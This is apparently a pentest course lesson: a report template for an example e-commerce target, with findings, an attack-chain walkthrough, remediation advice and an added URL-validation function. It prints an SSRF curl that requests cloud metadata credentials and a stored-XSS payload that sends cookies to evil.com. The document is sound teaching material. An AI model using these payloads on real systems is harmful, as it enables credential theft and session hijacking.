Advanced Pentest Report

🔥 Vibe Prompt

"Write a professional pentest report: executive summary, risk assessment, findings, recommendations."

Report Template

# Penetration Test Report: Target Application

## 1. Executive Summary
XYZ Corp engaged us to pentest their e-commerce platform.
Scope: web app, mobile API, infrastructure (10 IPs)
Duration: 2 weeks (May 1-14, 2024)
Team: 2 senior pentesters

### Key Findings
- Total vulnerabilities: 12 (3 Critical, 4 High, 3 Medium, 2 Low)
- Attack chain achieved: Unauthenticated RCE via SSRF → Cloud metadata → IAM keys
- CVSS average: 7.8/10

### Risk Rating
| Severity | Count |
|----------|-------|
| Critical | 3     |
| High     | 4     |
| Medium   | 3     |
| Low      | 2     |

## 2. Scope
- Web Application: https://shop.example.com
- Mobile API: https://api.example.com/v2
- Infrastructure: 10.0.0.0/24
- Source Code: GitHub repo (static analysis only)

## 3. Methodology
- Recon: passive (OSINT) + active (scanning)
- Automated: Nessus, Burp Suite Pro, Acunetix
- Manual: Business logic, auth, IDOR, race conditions
- Mobile: Frida, Objection, APKTool

## 4. Findings Detail

### CRITICAL: SSRF to Cloud Metadata (CVSS 9.1)
**Location:** /api/fetch?url=
**Description:** The fetch endpoint does not validate the supplied URL, so an attacker can make the server request the AWS instance metadata service on its behalf.

**Reproduction:**
```bash
curl "https://shop.example.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"
```

**Impact:** Full AWS credential compromise → data breach

**Recommendation:**
- Block private IP ranges (169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12)
- Use an allowlist of approved URLs
- Remove the feature or restrict to specific domains
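The first two recommendations above, as an added Python example that is not part of the course template: an allowlist of approved hosts combined with a block on the private, link-local and loopback ranges, applied to every address a host resolves to. The allowed hostnames and the injectable `resolve` parameter are assumptions.

```python
# Added example, not the course's code: validation for a "fetch this URL"
# feature implementing the recommendation above (allowlist + blocked ranges).
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges named in the recommendation, plus loopback, "this host" and the
# IPv6 equivalents that an IPv4-only check would miss.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "0.0.0.0/8", "::1/128", "fe80::/10", "fc00::/7",
)]
ALLOWED_HOSTS = {"cdn.example.com", "partner-api.example.com"}  # constructed


def is_blocked_ip(ip: str) -> bool:
    """True if the address lies in a private, link-local or loopback range."""
    addr = ipaddress.ip_address(ip)
    # ::ffff:169.254.169.254 is the metadata address in an IPv6 wrapper;
    # judge the embedded IPv4 address, not the wrapper.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (addr.is_loopback or addr.is_link_local
            or any(addr in net for net in BLOCKED_NETS))


def validate_fetch_url(url: str, resolve=None):
    """Return (allowed, reason). `resolve` maps a hostname to a list of IP
    strings; it is injectable so the check can run offline in tests."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not permitted"
    host = parts.hostname
    if not host or host not in ALLOWED_HOSTS:   # literal IPs never pass here
        return False, f"host {host!r} not on allowlist"
    # An allowlisted name can still point inward (rebinding, hijacked DNS): check
    # every resolved address, and have the fetcher connect to the validated one.
    try:
        ips = (resolve(host) if resolve
               else [r[4][0] for r in socket.getaddrinfo(host, None)])
    except socket.gaierror:
        return False, f"could not resolve {host!r}"
    for ip in ips:
        if is_blocked_ip(ip):
            return False, f"{host!r} resolves to blocked address {ip}"
    return True, "ok"
```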

### HIGH: Stored XSS (CVSS 6.8)
**Location:** User profile name field
**Description:** The name field is not sanitized; script stored in it executes whenever the profile is rendered.

**Reproduction:**
```
POST /api/profile
{"name": "<script>fetch('https://evil.com/steal?c='+document.cookie)</script>"}
```

**Impact:** Session hijacking, admin account takeover

**Recommendation:**
- Sanitize all user input (bleach, DOMPurify)
- Implement Content-Security-Policy
- Use HttpOnly cookies

## 5. Attack Chain Walkthrough

1. [Recon] Found fetch API endpoint via JS analysis
2. [SSRF] Accessed AWS metadata → retrieved IAM credentials
3. [Cloud] Used IAM keys to list S3 buckets → customer data exposed
4. [Auth] Weak JWT secret → forged admin token
5. [Impact] Full admin access to customer DB

Total time: 4 hours (automated + manual)

## 6. Risk Matrix

| Impact \ Likelihood | Low | Med | High |
|---------------------|-----|-----|------|
| Critical            | 0   | 1   | 2    |
| High                | 1   | 2   | 1    |
| Medium              | 2   | 1   | 0    |
| Low                 | 2   | 0   | 0    |

## 7. Recommendations by Priority

P0 (Immediate):
  - Fix SSRF (block private IPs)
  - Rotate all IAM keys
  - Implement WAF (Cloudflare)

P1 (This sprint):
  - Sanitize all user inputs (XSS)
  - Change JWT secret to 256-bit random
  - Rate limit login endpoint

P2 (Next sprint):
  - Implement CSP headers
  - Add security headers (HSTS, X-Frame-Options)
  - Move secrets to AWS Secrets Manager

P3 (Backlog):
  - Regular dependency scanning
  - Bug bounty program
  - Security training for developers

## 8. Tools Used

| Tool | Purpose |
|------|---------|
| Burp Suite Pro | Web proxy, scanner |
| Nmap | Network scanning |
| Gobuster | Directory brute force |
| Frida | Mobile runtime |
| Nessus | Vulnerability scanning |
| Metasploit | Exploitation |
| Custom Python scripts | Business logic testing |

PenTesting Advanced Course Complete! 🎉

  • ✅ Recon & OSINT
  • ✅ Exploit Development
  • ✅ Web Exploitation
  • ✅ Mobile & API
  • ✅ Report Writing

## Report Writing Principles
| Principle | Why |
|-----------|-----|
| Executive summary first | Non-technical audience |
| Reproduce steps clearly | Developer can verify |
| Business impact | Prioritization |
| Fix recommendations | Actionable |
| Attack chain demo | Shows real risk |
| Risk matrix | Visual priority |

## Best Practices
- Show attack chain (not just isolated bugs)
- Provide clear reproduction steps (curl commands)
- Map findings to OWASP Top 10 / CWE
- Give CVSS score for each finding
- Separate technical vs executive sections
- Include positive findings (things done right)
- Follow up after retest
